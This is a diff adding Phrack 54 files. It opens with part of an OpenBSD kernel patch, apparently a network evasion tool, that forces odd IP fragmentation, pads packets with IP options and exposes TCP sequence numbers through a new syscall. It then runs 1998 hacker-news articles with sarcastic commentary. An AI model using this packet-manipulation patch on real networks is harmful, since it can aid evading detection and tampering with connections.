+ extern struct baddynamicports baddynamicports;
+ 
++extern int ip_fraghackhead;
++extern int ip_fraghackbody;
++extern int ip_optionshack;
++
+ extern	struct domain inetdomain;
+ extern	struct protosw inetsw[];
+ u_char	ip_protox[IPPROTO_MAX];
+@@ -1314,6 +1318,15 @@
+ 	case IPCTL_IPPORT_HILASTAUTO:
+ 		return (sysctl_int(oldp, oldlenp, newp, newlen,
+ 		    &ipport_hilastauto));
++	case IPCTL_FRAG_HACK_HEAD:
++		return (sysctl_int(oldp, oldlenp, newp, newlen,
++		    &ip_fraghackhead));
++	case IPCTL_FRAG_HACK_BODY:
++		return (sysctl_int(oldp, oldlenp, newp, newlen,
++		    &ip_fraghackbody));
++	case IPCTL_OPTIONS_HACK:
++		return (sysctl_int(oldp, oldlenp, newp, newlen,
++		    &ip_optionshack));
+ 	default:
+ 		return (EOPNOTSUPP);
+ 	}
+diff -u /usr/src/sys.2.4.orig/netinet/ip_output.c netinet/ip_output.c
+--- /usr/src/sys.2.4.orig/netinet/ip_output.c	Tue Dec  8 10:32:43 1998
++++ netinet/ip_output.c	Tue Dec  8 11:00:14 1998
+@@ -88,6 +88,10 @@
+ extern int ipsec_esp_network_default_level;
+ #endif
+ 
++int ip_fraghackhead=0;
++int ip_fraghackbody=0;
++int ip_optionshack=0;
++
+ /*
+  * IP output.  The packet in mbuf chain m contains a skeletal IP
+  * header (with len, off, ttl, proto, tos, src, dst).
+@@ -124,6 +128,9 @@
+ 	struct inpcb *inp;
+ #endif
+ 
++	/* HACK */
++	int fakeheadmtu;
++
+ 	va_start(ap, m0);
+ 	opt = va_arg(ap, struct mbuf *);
+ 	ro = va_arg(ap, struct route *);
+@@ -144,7 +151,50 @@
+ 		m = ip_insertoptions(m, opt, &len);
+ 		hlen = len;
+ 	}
++	/* HACK */
++	else if (ip_optionshack && !(flags & (IP_RAWOUTPUT|IP_FORWARDING)))
++	{
++		struct mbuf *n=NULL;
++		register struct ip* ip= mtod(m, struct ip*);
++
++		if (m->m_flags & M_EXT || m->m_data - 40 < m->m_pktdat) 
++		{
++			MGETHDR(n, M_DONTWAIT, MT_HEADER);
++			if (n)
++			{
++				n->m_pkthdr.len = m->m_pkthdr.len + 40;
++				m->m_len -= sizeof(struct ip);
++				m->m_data += sizeof(struct ip);
++				n->m_next = m;
++				m = n;
++				m->m_len = 40 + sizeof(struct ip);
++				m->m_data += max_linkhdr;
++				bcopy((caddr_t)ip, mtod(m, caddr_t), 
++					sizeof(struct ip));
++			}
++		} 
++		else 
++		{
++			m->m_data -= 40;
++			m->m_len += 40;
++			m->m_pkthdr.len += 40;
++			ovbcopy((caddr_t)ip, mtod(m, caddr_t), 
++				sizeof(struct ip));
++			n++; /* make n!=0 */
++		}
++		if (n!=0)
++		{
++			ip = mtod(m, struct ip *);
++			memset((caddr_t)(ip+1),0,40);
++			ip->ip_len += 40;
++
++			hlen=60;
++			len=60;	
++		}
++	}
++
+ 	ip = mtod(m, struct ip *);
++
+ 	/*
+ 	 * Fill in IP header.
+ 	 */
+@@ -721,7 +771,15 @@
+ 	/*
+ 	 * If small enough for interface, can just send directly.
+ 	 */
+-	if ((u_int16_t)ip->ip_len <= ifp->if_mtu) {
++
++	/* HACK */
++
++	fakeheadmtu=ifp->if_mtu;
++
++	if ((ip_fraghackhead) && !(flags & (IP_RAWOUTPUT|IP_FORWARDING)))
++		fakeheadmtu=ip_fraghackhead;
++
++	if ((u_int16_t)ip->ip_len <= fakeheadmtu/*ifp->if_mtu*/) {
+ 		ip->ip_len = htons((u_int16_t)ip->ip_len);
+ 		ip->ip_off = htons((u_int16_t)ip->ip_off);
+ 		ip->ip_sum = 0;
+@@ -738,7 +796,10 @@
+ 		ipstat.ips_cantfrag++;
+ 		goto bad;
+ 	}
+-	len = (ifp->if_mtu - hlen) &~ 7;
++
++/* HACK */
++
++	len = (/*ifp->if_mtu*/fakeheadmtu - hlen) &~ 7;
+ 	if (len < 8) {
+ 		error = EMSGSIZE;
+ 		goto bad;
+@@ -748,6 +809,9 @@
+ 	int mhlen, firstlen = len;
+ 	struct mbuf **mnext = &m->m_nextpkt;
+ 
++	/*HACK*/
++	int first=0;
++
+ 	/*
+ 	 * Loop through length of segment after first fragment,
+ 	 * make new header and copy data of each part and link onto chain.
+@@ -755,7 +819,9 @@
+ 	m0 = m;
+ 	mhlen = sizeof (struct ip);
+ 	for (off = hlen + len; off < (u_int16_t)ip->ip_len; off += len) {
+-		MGETHDR(m, M_DONTWAIT, MT_HEADER);
++		if (first && ip_fraghackbody)
++			len=(ip_fraghackbody-hlen) &~7;
++		MGETHDR(m,  M_DONTWAIT, MT_HEADER);
+ 		if (m == 0) {
+ 			error = ENOBUFS;
+ 			ipstat.ips_odropped++;
+@@ -791,6 +857,7 @@
+ 		mhip->ip_sum = 0;
+ 		mhip->ip_sum = in_cksum(m, mhlen);
+ 		ipstat.ips_ofragments++;
++		first=1;
+ 	}
+ 	/*
+ 	 * Update first fragment by trimming what's been copied out
+Common subdirectories: /usr/src/sys.2.4.orig/netinet/libdeslite and netinet/libdeslite
+diff -u /usr/src/sys.2.4.orig/netinet/tcp_subr.c netinet/tcp_subr.c
+--- /usr/src/sys.2.4.orig/netinet/tcp_subr.c	Tue Dec  8 10:32:45 1998
++++ netinet/tcp_subr.c	Tue Dec  8 10:48:33 1998
+@@ -465,3 +465,18 @@
+ 	if (tp)
+ 		tp->snd_cwnd = tp->t_maxseg;
+ }
++
++/* HACK - This is a tcp subroutine added to grab the sequence numbers */
++
++void tcp_getseq(struct socket *so, struct mbuf *m)
++{
++	struct inpcb *inp;
++	struct tcpcb *tp;
++
++	if ((inp=sotoinpcb(so)) && (tp=intotcpcb(inp)))
++	{
++		m->m_len=sizeof(unsigned long)*2;
++		*(mtod(m,unsigned long *))=tp->snd_nxt;
++		*((mtod(m,unsigned long *))+1)=tp->rcv_nxt;
++	}
++}
+diff -u /usr/src/sys.2.4.orig/netinet/tcp_usrreq.c netinet/tcp_usrreq.c
+--- /usr/src/sys.2.4.orig/netinet/tcp_usrreq.c	Tue Dec  8 10:32:45 1998
++++ netinet/tcp_usrreq.c	Tue Dec  8 10:48:33 1998
+@@ -363,6 +363,10 @@
+ 		in_setsockaddr(inp, nam);
+ 		break;
+ 
++	case PRU_SOCKINFO:
++		tcp_getseq(so,m);
++		break;
++
+ 	case PRU_PEERADDR:
+ 		in_setpeeraddr(inp, nam);
+ 		break;
+diff -u /usr/src/sys.2.4.orig/netinet/tcp_var.h netinet/tcp_var.h
+--- /usr/src/sys.2.4.orig/netinet/tcp_var.h	Tue Dec  8 10:32:45 1998
++++ netinet/tcp_var.h	Tue Dec  8 10:48:34 1998
+@@ -291,6 +291,8 @@
+ void	 tcp_pulloutofband __P((struct socket *,
+ 	    struct tcpiphdr *, struct mbuf *));
+ void	 tcp_quench __P((struct inpcb *, int));
++/*HACK*/
++void	 tcp_getseq __P((struct socket *, struct mbuf *));
+ int	 tcp_reass __P((struct tcpcb *, struct tcpiphdr *, struct mbuf *));
+ void	 tcp_respond __P((struct tcpcb *,
+ 	    struct tcpiphdr *, struct mbuf *, tcp_seq, tcp_seq, int));
+<-->
+<++> congestant/kern.patch
+--- /usr/src/sys.2.4.orig/kern/uipc_syscalls.c	Thu Dec  3 11:00:01 1998
++++ kern/uipc_syscalls.c	Thu Dec  3 11:13:44 1998
+@@ -924,6 +924,53 @@
+ }
+ 
+ /*
++ * Get socket information.  HACK 
++ */
++
++/* ARGSUSED */
++int
++sys_getsockinfo(p, v, retval)
++	struct proc *p;
++	void *v;
++	register_t *retval;
++{
++	register struct sys_getsockinfo_args /* {
++		syscallarg(int) fdes;
++		syscallarg(int *) type;
++		syscallarg(int *) seq;
++		syscallarg(int *) ack;
++	} */ *uap = v;
++	struct file *fp;
++	register struct socket *so;
++	struct mbuf *m;
++	int error;
++
++	if ((error = getsock(p->p_fd, SCARG(uap, fdes), &fp)) != 0)
++		return (error);
++
++	so = (struct socket *)fp->f_data;
++
++	error = copyout((caddr_t)&(so->so_type), (caddr_t)SCARG(uap, type), (u_int)sizeof(short));
++
++	if (!error && (so->so_type==SOCK_STREAM))
++	{
++		m = m_getclr(M_WAIT, MT_DATA);
++		if (m == NULL)
++			return (ENOBUFS);
++
++		error = (*so->so_proto->pr_usrreq)(so, PRU_SOCKINFO, m, 0, 0);
++
++		if (!error)
++			error = copyout(mtod(m,caddr_t), (caddr_t)SCARG(uap, seq), (u_int)sizeof(long));
++		if (!error)
++			error = copyout(mtod(m,caddr_t)+sizeof(long), (caddr_t)SCARG(uap, ack), (u_int)sizeof(long));
++		m_freem(m);
++	}
++
++	return error;
++}
++
++/*
+  * Get name of peer for connected socket.
+  */
+ /* ARGSUSED */
+--- /usr/src/sys.2.4.orig/kern/syscalls.master	Thu Dec  3 11:00:00 1998
++++ kern/syscalls.master	Thu Dec  3 11:14:44 1998
+@@ -476,7 +476,8 @@
+ 240	STD		{ int sys_nanosleep(const struct timespec *rqtp, \
+ 			    struct timespec *rmtp); }
+ 241	UNIMPL
+-242	UNIMPL
++242	STD		{ int sys_getsockinfo(int fdes, int *type, \
++			    int *seq, int *ack); }
+ 243	UNIMPL
+ 244	UNIMPL
+ 245	UNIMPL
+<-->
+<++> congestant/sys.patch
+--- /usr/src/sys.2.4.orig/sys/protosw.h	Thu Dec  3 11:00:39 1998
++++ sys/protosw.h	Thu Dec  3 11:16:41 1998
+@@ -148,8 +148,8 @@
+ #define	PRU_SLOWTIMO		19	/* 500ms timeout */
+ #define	PRU_PROTORCV		20	/* receive from below */
+ #define	PRU_PROTOSEND		21	/* send to below */
+-
+-#define	PRU_NREQ		21
++#define PRU_SOCKINFO		22
++#define	PRU_NREQ		22
+ 
+ #ifdef PRUREQUESTS
+ char *prurequests[] = {
+@@ -158,7 +158,7 @@
+ 	"RCVD",		"SEND",		"ABORT",	"CONTROL",
+ 	"SENSE",	"RCVOOB",	"SENDOOB",	"SOCKADDR",
+ 	"PEERADDR",	"CONNECT2",	"FASTTIMO",	"SLOWTIMO",
+-	"PROTORCV",	"PROTOSEND",
++	"PROTORCV",	"PROTOSEND", 	"SOCKINFO",
+ };
+ #endif
+<-->
+
+----[  EOF
diff --git a/phrack54/11.txt b/phrack54/11.txt
new file mode 100644
index 0000000..cffffc9
--- /dev/null
+++ b/phrack54/11.txt
@@ -0,0 +1,2291 @@
+---[  Phrack Magazine   Volume 8, Issue 54 Dec 25th, 1998, article 11 of 12
+
+
+-------------------------[  P H R A C K     W O R L D     N E W S
+
+
+--------[  Issue 54
+           
+
+Hi. A few changes have been made to Phrack World News (PWN) and will
+probably change again in the future.  Because of the increase of news on
+the net, security, hackers and other PWN topics, it is getting more
+difficult to keep Phrack readers informed of everything.  To combat this
+problem, PWN will include more articles, but only relevant portions (or
+the parts I want to make smart ass remarks about).  If you would like to
+read the full article, look through the ISN (InfoSec News) archives
+located at: 
+
+        ftp.repsec.com          /pub/text/digests/isn
+
+If you would like timely news delivered with less smart ass remarks, you
+can always subscribe to ISN by mailing majordomo@repsec.com with 'subscribe
+isn' in the body of your mail. 
+
+The following articles have been accumulated from a wide variety of places.
+When known, original source/author/date has been included.  If the information
+is absent, then it wasn't sent to us. 
+
+As usual, I am putting some of my own comments in brackets to help readers
+realize a few things left out of the articles.  Comments are my own, and
+do not necessarily represent the views of Phrack, journalists, government
+spooks, my cat, or anyone else.  If you want to see more serious comments
+about the piss poor journalism plagueing us today, visit the Security
+Scene Errata web page: http://www.attrition.org/errata/
+
+If you feel the need to send me love letters, please cc: 
+route@infonexus.com so he can see I really do have fans.  If you would like
+to mail my cat, don't, he hates you because you are a plebian in his eyes.
+Meow. 
+
+This installment of PWN is dedicated to Feds, Hackers, and blatant stupidity.
+It was brought to you by the letters that collectively spell 'dumb shit'. 
+
+- disorder
+
+--------[  Issue 54
+
+ 0x1: Teen Crackers Admit Guilt
+ 0x2: FBI grads get gun, badge, and now, a laptop
+ 0x3: Meet the Hacker Trackers
+ 0x4: Justice Department to Hire Computer Hackers
+ 0x5: A Cracker-Proofing Guarantee
+ 0x6: First-Ever Insurance Against Hackers
+ 0x7: New Unit to Combat High-Tech Crime (National Police Agency)
+ 0x8: First 'Cyber Warrior' Unit is Poised for Operational Status (DOD)
+ 0x9: Tracking Global Cybercrime (Chamber of Commerce)
+ 0xa: FBI Opens High-Tech Crisis Center 
+ 0xb: Navy fights new hack method
+ 0xc: Pentagon Blocks DoS Attack
+ 0xd: Hackers Elude Accelerator Center Staff
+ 0xe: Cyberattacks leave feds chasing 'vapor'
+ 0xf: Congress Attacks Cyber Defense Funds
+ 0x10: Mudge on Security Vendors
+ 0x11: More delays for Mitnick trial
+ 0x12: 'Back door' doesn't get very far 
+ 0x13: ICSA Goon Pretends to be a Hacker      
+ 0x14: Is Your kid a Hacker
+ 0x15: Paging Network Hijacked              
+ 0x16: FBI busts hacker who sold clandestine accounts on PageNet system
+ 0x17: EFF DES Cracker Machine Brings Honesty to Crypto Debate
+ 0x18: Hacking site gets hacked
+ 0x19: From Criminals to Web Crawlers
+ 0x1a: Running a Microsoft OS on a Network? Our Condolences
+ 0x1b: Security expert explains New York Times site break in
+ 0x1c: Merriam-Webster Taken Offline Old Fashioned Way
+ 0x1d: Long Haired Hacker Works Magic           
+ 0x1e: Body of Evidence
+ 0x1f: The Golden Age of Hacktivism
+ 0x20: Phrack straddles the world of hackers
+ 0x21: Cops see little hope in controlling computer crime
+
+0x1>-------------------------------------------------------------------------
+
+Title: Teen Crackers Admit Guilt
+Source: Wired
+Date: 1:10pm  11.Jun.98.PDT
+
+Two California teenagers have pleaded guilty to federal charges of
+cracking Pentagon computers, the San Francisco Chronicle reports. 
+   
+Terms of the plea are still being negotiated after a meeting last week
+between attorneys for the youths and federal officials, the newspaper
+said. Neither youth is expected to serve time in custody, sources close to
+the case said. 
+   
+In February, the FBI raided the Cloverdale homes of the two suspected
+crackers -- nicknamed Makaveli, 16, and TooShort, 15 -- and seized
+computers believed to have been used to break into unclassified computer
+systems in government agencies, military bases, and universities. 
+
+[Sucks to be busted. Sucks worse to plead guilty to being a script
+ kiddie.]
+
+The youths were never formally arrested in the FBI probe. US Deputy
+Defense Secretary John Hamre called the breach "the most organized and
+systematic attack" to date on Pentagon systems. 
+  
+[Feds only enjoy sticking guns in the faces of these kids. Not actually
+ arresting them.]
+
+0x2>-------------------------------------------------------------------------
+
+Title: FBI grads get gun, badge, and now, a laptop
+Source: TechWeb
+Date: 7.22.98
+
+When FBI special-agent trainees graduate from the bureau academy at
+Quantico, Va., they are each issued a gun, a badge -- and now, a laptop
+computer. 
+
+[Unfortunately, they don't always get a clue.]
+
+Crime today often involves the use of sophisticated technology, and new
+agents have to be able to shoot straight, learn the law, and be able to
+use technology.
+
+Part of the FBI's duty is to investigate computer-related crimes and
+issues of national security. Because it needs these specialized skills,
+the bureau is in competition with other agencies such as the Secret
+Service and the Central Intelligence Agency (CIA) -- as well as the
+private sector -- for recruits.
+
+[Great low pay! Lots of travel! No respect! Come join the FBI!]
+
+Attorney General Janet Reno, addressing a conference on children's safety
+on the Internet in December, called on the technology community to help
+law enforcement.
+
+But Reno's call does not mean making a computer geek into a G-man.  The
+FBI recruits in the high-tech industry and in colleges and universities
+for special agents with other attributes besides computer-science degrees.
+ 
+"There is not a specific category [in the FBI] for someone with more
+computer skills," said Special Agent Ron Van Vraken, an FBI spokesman. 
+"But someone with skills and experience is highly marketable. We've
+recognized we need to attract those people into the FBI."
+ 
+The FBI is not alone. 
+
+The CIA has a long listing of Web postings for technology-related jobs. 
+There are ongoing requirements for knowledge-based systems engineers,
+software developers, and electronics engineers listed alongside jobs such
+as theatrical-effects specialists and clandestine service trainees.
+
+[Yet the CIA is scrambling to find jobs for all the cold-war spook
+ rejects...]
+
+Although the CIA is not a law-enforcement agency like the FBI and the
+Secret Service, it, too, chases "bad guys" and needs people trained in
+technology, said Anya Guilsher, an agency spokeswoman. "We have a great
+interest in people with advanced technology skills," she said.
+ 
+The Secret Service, which investigates financially related crimes as well
+as protects the president, is also looking. Its jobs listings include
+openings for computer specialists and telecommunications specialists.
+
+The ideal candidate for these agencies is not necessarily a computer wiz,
+said Ron Williams, a former Secret Service agent and current CEO of
+high-tech security company Talon Technology.
+
+"The ideal candidate is well-rounded," he said, adding they should also
+understand computers, have good communications skills, and know human
+behavior.
+
+"To catch a criminal, you have to think like one," Williams said. "You can
+take agents, and if they have good street smarts and good computer skills,
+you can make them into hacker sleuths."
+
+[Hypothetically.. since they haven't done it yet.]
+
+0x3>-------------------------------------------------------------------------
+
+Title: Meet the Hacker Trackers 
+
+A gang of convicts dressed in cartoon-striped uniforms shuffle slowly
+along a sidewalk, searing in the noon-day sun. This is downtown Phoenix, a
+low-rise high-tech city with a decidedly old- fashioned approach to crime. 
+From her office on the sixth floor of the county attorney's office, the
+prosecutor remains unmoved by the sight of the prisoners. "People 'round
+here don't have much in the way of sympathy for criminals of any kind. And
+most of those guys are real criminals, not jumped up nobodies screaming
+for attention - the kind of people I deal with!" 
+
+Meet Gail Thackeray, the world's foremost legal expert on computer crime. 
+A former assistant attorney general of the state of Arizona, Thackeray has
+been fighting hackers and fraudsters for nearly 25 years. Now she works as
+a prosecutor for the Maricopa County attorney's office, a jurisdiction the
+size of New England that takes in all of Phoenix. It's most famous as the
+home of Sheriff Joe Arpaio, "the meanest sheriff in America". This is the
+man responsible for the convicts in stripes. He has made his reputation by
+toughening up prison conditions, to loud hollers of approval from
+freedom-loving Arizonans.
+
+Good citizens of Maricopa County can now walk the streets in safety, but
+for the big technology companies that have moved to the "valley of the
+sun", the unseen hand of hackers and computer phreaks is proving a major
+distraction. Whether it's a left-over hippy feeling, the University campus
+or just a reaction to the extreme heat, Phoenix is a top spot for computer
+criminals. Thackeray is there to stop them. 
+
+Arizona has perhaps the United States' strongest legal code against the
+activities of hackers, but sometimes Gail aches to fight fire with fire. 
+"We have to document every step of the way we investigate. They don't need
+to have our education. They just need one other crook showing them, like
+monkeys at a keyboard, how to imitate the crime. The bulletin boards were
+the precursors to this, but the Net has exploded it down to the individual
+level anywhere in the world. You don't need sophistication, you don't even
+need very good equipment - one of the best hackers we've ever dealt with
+had a Compaq luggable 286 and he was wreaking havoc around the world. Just
+a list of his route on different systems attached to the Internet would
+keep me in the hacker business for the rest of my life - it goes on for
+pages." 
+
+Getting away with it
+
+We move from her office to the conference room next door. Thackeray
+proudly displays her new Compaq notebook. Her famous slide show is now
+held on the notebook's hard disk. For more years than she'd care to
+remember, Thackeray has been showing her slides to police forces and
+prosecutors across the United States, advising them how to build a case
+against hackers. She also trains police forces all over the country,
+including secret service agents at the Georgia Federal training centre.
+Even the bad guys have been known to call her to find out what the cops
+have been up to. 
+ 
+Although she has been a hacker tracker for 25 years, Thackeray is more
+depressed than ever by the escalating scale of computer crime. The Web,
+she says, has made it impossible to catch the crooks. "Even if it's the
+boy next door, we haven't a chance. He may be doing something rotten to
+your high-tech consulting firm, he may be next door trying to steal your
+stuff - but he's looping through a long-distance carrier, a corporate
+phone system, three Internet providers and circling the world twice before
+he hits you. That's the problem from our standpoint. Even assuming all
+those parties can trace the links they're involved in, we have to go
+through a different process, and probably a different law enforcement
+agency, for every single one.
+
+"In the old days out here, the Texas rangers were very famous for catching
+bank robbers. They didn't stop at the Texas border when chasing a killer. 
+They'd jump on their horse and, even if they crossed the state line, they
+would follow wherever the chase lead them. In the computer age we can't do
+that at all. What we have now in the US is a mish-mash of laws and
+agencies. Multiply that on the international level and it's completely out
+of hand." 
+
+High-tech law enforcement
+
+Thackeray moved to Arizona in 1986 after beginning her career as a
+prosecutor in Philadelphia. She worked in the attorney general's office
+running an organised crime and racketeering unit that won a national
+reputation for its technical ability in the fight against hackers. She was
+also the mastermind behind Operation Sundevil (see panel, overleaf), the
+first nationally coordinated raid on hackers. But then democracy took a
+turn and she became a victim of the strange process by which Americans
+elect their most senior law officers. Her boss lost the race to be elected
+attorney general. The victor wasn't interested in technology so 12 people
+got sacked, including Thackeray. 
+
+Taking a break from the slide show for a moment, she shows me a little
+number-generating program stored on her laptop. It generates random
+numbers for Visa cards. Give it the four-digit code that identifies a card
+issuer and within minutes you'll have hundreds of false credit card
+numbers to play with. "Now supposing you had another little program that
+made the bank think these numbers were legitimate - How much do you think
+you could make?" We go on-line to see some of the hacker sites. Thackeray
+believes that the Web is making a bigger range of crimes much easier to
+commit. "In the future the good parts of the Internet will be bigger and
+more complex and available to more people and that's great. But this means
+all of those people will have victim potential. Thanks to the growth of
+the Web, one criminal can now do an unprecedented amount of damage,
+whether it's to corporations or to individual's feelings by threatening
+and stalking, spam attacks or just shutting down ISPs. 
+
+"We have had four incidents in the first six months of this year.  These
+people are attacking not just the little local service provider, but also
+some of the 19 Internet backbone carriers. They're absolutely ruthless and
+don't care who they hurt. In a case in Tucson, tens of thousands of users
+were shut down just because some person with an adolescent level of
+maturity decided he was mad at another ISP, so he took all of its
+customers off-line. It's frighteningly easy to do and only took one
+broadcast message. All the routers that run the Internet shake hands
+periodically, so if you can infect one router, given time it will infect
+the entire world. And that's what happened. It took just a few days for
+the entire world to believe that this service provider, and all its
+customers, didn't exist."  Not only is the Web host to a whole new range
+of crimes, it's also home to a brand new band of weirdos. "Unfortunately
+the Web is the best playground ever invented for sociopaths. They can
+hide, are anonymous and can't be traced. Nobody is in charge and it gives
+them that power rush that psychologists say is what they live off. It's
+their whole life's breath. It's the chest-beating power surge of being
+able to do it and get away with it. We are just seeing more acts of wanton
+destruction simply for the sake of showing that you can do it." 
+
+Does she think this new generation of Web hackers is a real threat to
+people? "Every baby in America knows the 911 emergency system. If mommy's
+drowning in the pool, we've had three-year- olds save her life by dialling
+911. The hackers have attacked the 911 system and they're still doing it. 
+That's not for knowledge or for glory, that's just an act of vicious ego." 
+
+Rat's nests and technocrap
+
+Personal liberty is taken very seriously in the western United States. 
+No-one likes the idea of "big government" interfering with people's lives. 
+Even hackers gain sympathy when they complain of harassment by police and
+prosecutors. Some say they've been victimised by the authorities. 
+
+Thackeray denies this. "It's a hacker myth that we take away their
+computers and sit on them forever. In one case we came across, the guy had
+over 12Gb of data stored on his system - that's equivalent to 15,000
+paperback books. It's better that we seize all that material - you might
+have love letters, cook book recipes and your extortion kidnapping letter
+on the same disk. We can't take one without taking the other. We cannot
+physically copy that volume. It is far easier for us to take computers
+away than for us to camp out in your house for six months." 
+
+A hovel of a bedroom fills the projector screen. Coke cans everywhere,
+rubbish dotted across an unmade bed. In the corner sits a naked computer,
+stripped of casing, wires exposed. Thackeray calls it a rat's nest. She
+has hundreds of similar photos. "Back in Philadelphia I began collecting
+pictures of computers with their wires hanging out. When the geeks speak
+to a jury we call the language they use technocrap. What you have here is
+the physical version of technocrap." She gestures at the screen. Typically
+hackers will set up a stereo system within easy reach of the computer, and
+often a drinks cabinet as well. 
+
+A recent innovation is the home network. "We've come up against four or
+five houses recently where people have had multiple systems networked in
+the house. And that's even without running a bulletin board. When we get
+lucky and we're fast enough we can find the guilty computer - but the
+hardest part of the job is finding the brain behind the computer. To find
+that person is good old- fashioned low-tech police work." 
+
+Thackeray's team face another new problem caused by the huge increase in
+storage capacity. "In the computer situation no one throws anything out. 
+That makes our life more difficult. We don't want to read the last five
+year's worth of your e-mail, life's too short and frankly it's not that
+interesting. But sometimes we're searching for one piece of evidence and
+it's buried in a huge volume of stuff so what else can we do?"
+
+Tracking or trailing? 
+
+The slide show draws to an end. We amble downstairs to the office of
+another investigator. He shows us an array of hacker memorabilia on his
+computer. I ask Gail about the future. She believes that unless there's a
+fundamental change in the way police forces treat computer crime, there is
+no hope at all. "The police departments and prosecutors around the country
+are, frankly, paramilitary organisations with very bureaucratic, layered
+decision- making processes. They see the need for more training in gangs; 
+they don't see the need for more training in computers because the
+management came out of the knife and gun club. 
+
+"Police management is dominated by the physical crimes people.  We've got
+to dissolve some of these barriers. When we move we need to move fast like
+the Texas rangers - both legally and bureaucratically we're just not there
+yet. When I started 20 years ago law enforcement was behind the computer
+crime wave. We're farther behind today than we were then."
+
+Matt McGrath is an investigative journalist who works for Radio 5. 
+
+0x4>-------------------------------------------------------------------------
+
+Title: Justice Department to Hire Computer Hackers
+Source: Business Week
+Date: Aug. 6, 1998
+
+Wanted: Hackers to break into the Justice Dept. computer network. Under a
+program known as Operation Get Cracking, the Justice Dept. sought members
+of the computer underground at late July's Def Con hackers' conference in
+Las Vegas, BUSINESS WEEK reports in its August 17 issue. Attorney General
+Janet Reno has quietly committed $1 million to hire up to 16 hackers to
+test the Department's networks, says a source at Justice, which would
+neither confirm nor deny the operation. 
+
+[Uh... huh... I won't go there.]
+
+0x5>-------------------------------------------------------------------------
+
+Title: A Cracker-Proofing Guarantee
+Source: Wired News Report
+Date: 9:05 a.m.  5.Oct.98.PDT
+
+CIGNA Secure Systems Insurance is offering a US$25 million liability
+policy designed to cover losses resulting from attacks by computer
+crackers, the company said Monday.
+
+To qualify for coverage, a client must secure its systems or pass
+inspection from a CIGNA-approved security-management company. Otherwise,
+potential clients are encouraged to contract with security-management
+company NetSolve, in conjunction with Cisco's NetRanger
+intrusion-detection software, which is pre-approved by CIGNA.
+
+CIGNA Secure Systems Insurance provides coverage for theft of money,
+securities, and property; for damage done by crackers to a firm's data or
+software; and for business losses caused by attacks on a company's
+computer systems. 
+
+[And how do they put value on your information? Who audits the system
+ to make sure you are telling the truth about your policy?]
+
+A recent survey by the Computer Security Institute and the FBI found a 36
+percent increase from the previous year in losses stemming from
+computer-security breaches. However, traditional property and liability
+insurance policies do not address these risks, according to CIGNA.
+
+"It's a nice marketing ploy," said computer security consultant Pete
+Shiply. "But if someone is concentrating on breaking into a site,
+eventually they will get in. There is no such thing as a secure site; 
+security is economics, it's a question of money and how much you want to
+invest." 
+
+Asked what kind of intrusion might lead to a $25 million claim, Shiply was
+skeptical. 
+
+"While I haven't read the agreements, I am pretty sure you would not get
+that much,"  he said. "You would have to prove losses approaching that
+figure, and that will likely be a difficult thing to do."
+
+0x6>-------------------------------------------------------------------------
+
+Title: First-Ever Insurance Against Hackers
+Source: Reuters
+Date: 14-JUN-98
+By: Therese Poletti 
+
+A computer security firm is so certain of its security prowess that it is
+offering to protect its customers with the first-ever hacker insurance, in
+the event a customer is successfully invaded by hackers.
+
+[So secure, hackers dumped logs of one of the ICSA's machines being
+ hacked to several IRC channels. Do as we say, not as we do.]
+
+ICSA Inc., the International Computer Security Association, is now
+offering as part of its TruSecure service, insurance against hacker
+attacks. ISCA will pay up to $250,000 if a customer's network is hacked
+into, after it has followed the TruSecure criteria.
+
+``This is the first hacker-related insurance,'' said Peter Tibbett,
+president of the ICSA, based in Carlisle, Penn. ``It puts our money where
+our mouth is.''
+
+ICSA sells its TruSecure service for $40,000 a year. The service, which it
+has been offering for several years, is a series of steps, methods and
+procedures that an ICSA client must adhere to. Some steps are simple,
+common sense procedures, such as having the server which hosts your
+company's Web site inside a locked room.
+
+[You pay 40,000 a year, for up to 250,000 insurance. Pretty high
+ premium. 40,000 will buy you a lot of security consulting and additional
+ security precautions.]
+
+Other steps are more complicated, such as the requirement to have a secure
+firewall around an internal network.
+
+But the ICSA does not sell products. Instead, it recommends a whole range
+of software that it has approved as secure and meets its standards,
+through open meetings and debates, with all its members, many of whom
+develop security products.
+
+Then, ICSA tests a client's security by using typical hacker methods,
+through its 100 or so employees, none of whom are reformed hackers.  ICSA
+believes, along with executives at International Business Machines Corp.
+who perform ``ethical'' hacking on its customers, that there is no such
+thing as a reformed hacker.
+
+``We spray them with hacker tools and see where their vulnerabilities
+are,'' Tibbett said, referring to many of the widely-used hacker programs
+that are available over the Internet or shared among hackers. ``The
+average site took about two weeks to get to the place where they meet all
+our requirements.''
+
+After ICSA completes a six-step process to test and improve a company's
+security, the customer is deemed secure and will then receive insurance.
+
+The ICSA said it will pay its customers if they fall prey to a hacker,
+even if they are not financially harmed from the attack.
+
+``Whether you lose money or not, we will pay,'' Tibbett said. ''We believe
+that we reduce the risk dramatically ... Yes, we expect to write some
+checks, but we don't expect to write very many.''
+
+Tibbett likens the ICSA to the Center for Disease Control, because it
+tracks all hacker attacks and tests every hacker tool and virus its
+progammers can find. The ICSA also is known for its emergency response
+center, which tracks the fallout from known computer viruses and helps
+companies in a crisis.
+
+``Good enough is never going to be perfect,'' Tibbett said. ''But we have
+a motivation to improve our service. If we have to write a check when
+someone gets hacked, it gives us another emphasis.''
+
+The company said it is partnering with major nationwide insurance carriers
+who recognize the ICSA TruSecure certification as a requirement for hacker
+policies.
+
+0x7>-------------------------------------------------------------------------
+
+Title: New Unit to Combat High-Tech Crime
+By: Yomiuri Shimbun
+Date: June 05, 1998
+
+The National Police Agency plans to create a special "cyberpolice" unit to
+combat the rise in high-tech crimes involving the Internet and other new
+technologies, the agency said Wednesday in announcing its new high-tech
+crime program. Information will be exchanged with its investigative
+counterparts overseas on a 24-hour-a-day basis, it said. The program will
+include special high-tech crime squads at the prefectural level, and
+information security advisers at prefectural police stations who will
+liaise directly with the private sector, with which the NPA wants to
+coordinate its efforts. The agency will also request a budget for a
+"hacker-proof" supercomputer next fiscal year.
+
+The NPA recorded 263 high-tech crimes last year-eight times more than in
+1992. High-tech crime was on the agenda of the Group of Eight summit
+meeting in Britain last month, where the eight leaders agreed to report on
+their efforts to combat high-tech crime at the G-8 summit in Cologne,
+Germany, next year. The NPA said Japan's current laws are inadequate and
+it would push to have new laws enacted to limit access to computers by
+those with criminal intent. 
+
+0x8>-------------------------------------------------------------------------
+
+Title: First 'Cyber Warrior' Unit is Poised for Operational Status
+By: Bryan Bender
+Date: June 17 1998
+
+The US Department of Defense (DoD) plans to stand up its first operational
+unit of `cyber warriors' by September to safeguard against and respond to
+computer attacks aimed at the US military, according to defence officials. 
+
